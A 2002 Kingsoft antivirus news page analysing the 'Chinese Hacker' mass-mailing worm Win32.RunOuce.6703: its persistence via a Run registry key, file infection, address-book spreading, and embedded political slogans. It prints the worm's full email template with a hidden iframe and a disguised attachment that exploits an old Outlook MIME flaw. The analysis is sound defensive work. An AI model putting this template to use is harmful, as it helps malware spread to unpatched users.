个人产品
企业产品
安全信息
病毒专栏 | 漏洞专栏 | 木马专栏 | 防护专栏 | 安全业界 | 毒霸活动 | 热点专题 | 漫画安全 | 期刊订阅
[an error occurred while processing this directive]
告诉您的位置:首页 > 资讯中心 > 毒霸报道 > 正文
“中国黑客”病毒详细技术分析报告
2002年06月07日10:14:20 金山反病毒资讯网 
[an error occurred while processing this directive]
  病毒名称:Win32.RunOuce.6703

  Win32.RunOuce.6703病毒通过进入计算机,利用IE安全系统的IFRAME漏洞进行攻击。它能通过Email传播,并且可以感染文件。

  病毒类型:蠕虫

  威胁评估:

  范围程度:中

  危害水平:中

  传播速度:高

  技术特征:

  1、病毒运行后,会:

  a.将自身拷贝到%System%目录下取名为RunOuce.exe。(注:%System%是可变的,该病毒会自动查找Windows系统目录,缺省情况下是 C:WindowsSystem) 并将自身拷贝到那里。

  b.病毒先在注册表项HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下添加:RunOuce %System%RunOuce.exe

  这样使用者启动系统时病毒就会自动运行。

  c.会感染后缀为EXE和SCR的PE可执行文件,且病毒代码中还带有部分调试信息,如INT 3。

  d.通过电子邮件传播

  该病毒会搜索Windows地址簿的邮件地址,然后将自己作为邮件的附件向这些邮件地址发送。邮件的主题是“Hi,i am %s”,%s是中毒者的计算机名字,附件名为P.EXE,邮件源地址(From:XXX@hotmail.com)

  以下是中国黑客病毒发送病毒邮件的邮件模板

  HELO btamail.net.cn

  MAIL FROM: iloveyou@btamail.net.cn

  RCPT TO: %s

  DATA

  FROM: %s@hotmail.com

  TO: %s

  SUBJECT: Hi,i am %s

  MIME-Version: 1.0

  Content-type: multipart/mixed; boundary="#BOUNDARY#"

  --#BOUNDARY#

  Content-Type: text/html

  Content-Transfer-Encoding: quoted-printable

  <html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>

  --#BOUNDARY#

  MIME-Version: 1.0

  Content-Type: audio/x-wav; name="p.exe"

  Content-Transfer-Encoding: base64

  Content-id: THE-CID

  如果在未打升级补丁的Outlook或Outlook Express中打开病毒邮件,邮件附件会自动运行。解决该缺陷的Outlook升级补丁可在如下地址下载:http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

  2、病毒体内含有如下信息:

  ChineseHacker

  枪毙李洪志!

  去他妈的法轮功!

  反对邪教,崇尚科学!

  打倒本拉登!

  向英雄王伟致意!

  反对霸权主义!

  社会主义好!

  防范措施:

  关掉并且移除不需要的服务。

  把补丁升级到最新,如IIS和IE。

  快速孤立感染的计算机阻止进一步扩散。

  清除方法:

  下载金山毒霸“中国黑客”专杀工具或升级手中的杀毒软件,查杀。
    【】
【我要发表评论】【内容指正】【论坛】【推荐给好友】·【 】【打印】·【顶部】【关闭窗口
【相关文章】 【去论坛】
· 中国黑客使用三线程技术 超越国外同类水平 2002-06-14 12:30
· “中国黑客”惊现接口 计算机用户需提高警惕 2002-06-13 13:06
· 查杀“中国黑客”实战记 2002-06-10 15:49
· 中国黑客病毒妄想利用聊天工具OICQ散播消息 2002-06-08 18:12
· 昨日截获“中国黑客” 病毒疑为国人制造 2002-06-07 17:13
· 中国黑客独创“三线程”结构 2002-06-07 16:43
· “中国黑客”中国造?病毒疑为国人又一杰作 2002-06-06 20:08
· “中国黑客”病毒自身存在严重BUG 2002-06-06 19:50
· 病毒层出不穷 金山公司最新截获“中国黑客” 2002-06-06 17:20
· 中国黑客活动猖獗 已位居世界第三位 2002-03-22 10:29
·金山毒霸单机版讨论区
·毒霸6测试专区
·金山网镖讨论区
·金山毒霸网络版讨论区
·毒霸在线业务专题讨论区
·安全软件讨论区
·病毒救援
【相关专题】
· 中国黑客病毒专题 2002-06-06 22:04
[an error occurred while processing this directive]
[an error occurred while processing this directive]
·全民围剿 新春无毒 
·
毒霸、网镖新功能体验版 
·
毒霸网络版2.0 sp1发布 
·
毒霸6新禧礼包惊喜登场
·
毒霸网络版 人人有礼
·毒霸网络版“租用服务”
·
金山毒霸网络版大事件
·第三次缉毒万里行专题
·JPEG图片病毒专题
·金山引爆“双响炮”计划
·金山毒霸6增强版介绍
·
十面埋伏围剿木马发布会
·
6.12北京用户产品座谈会
·
金山"网游防火墙"产品
·
反电子垃圾新功略专题
·“金山毒霸再获桂冠”
·金山“安全体验风暴”
·“冲击波”病毒之罪?
·全球黑客攻击专题
·金山毒霸V金山网镖V介绍
·金山V攻略详解专题
·金山毒霸&智冠捆绑销售
·金山软件爱心服务活动
·2003年病毒疫情调查专题
更多...
[an error occurred while processing this directive]
·病毒短信 ·在线杀毒
·病毒上报 ·专杀工具
·产品答疑 ·
媒体合作
金山简介 | 业务合作 | 广告服务 | 招聘信息 | 客服中心 | 网页报错 | 添加毒霸到QQ上
© 2007 Kingsoft Corp. 增值电信业务经营许可证B2-20040288号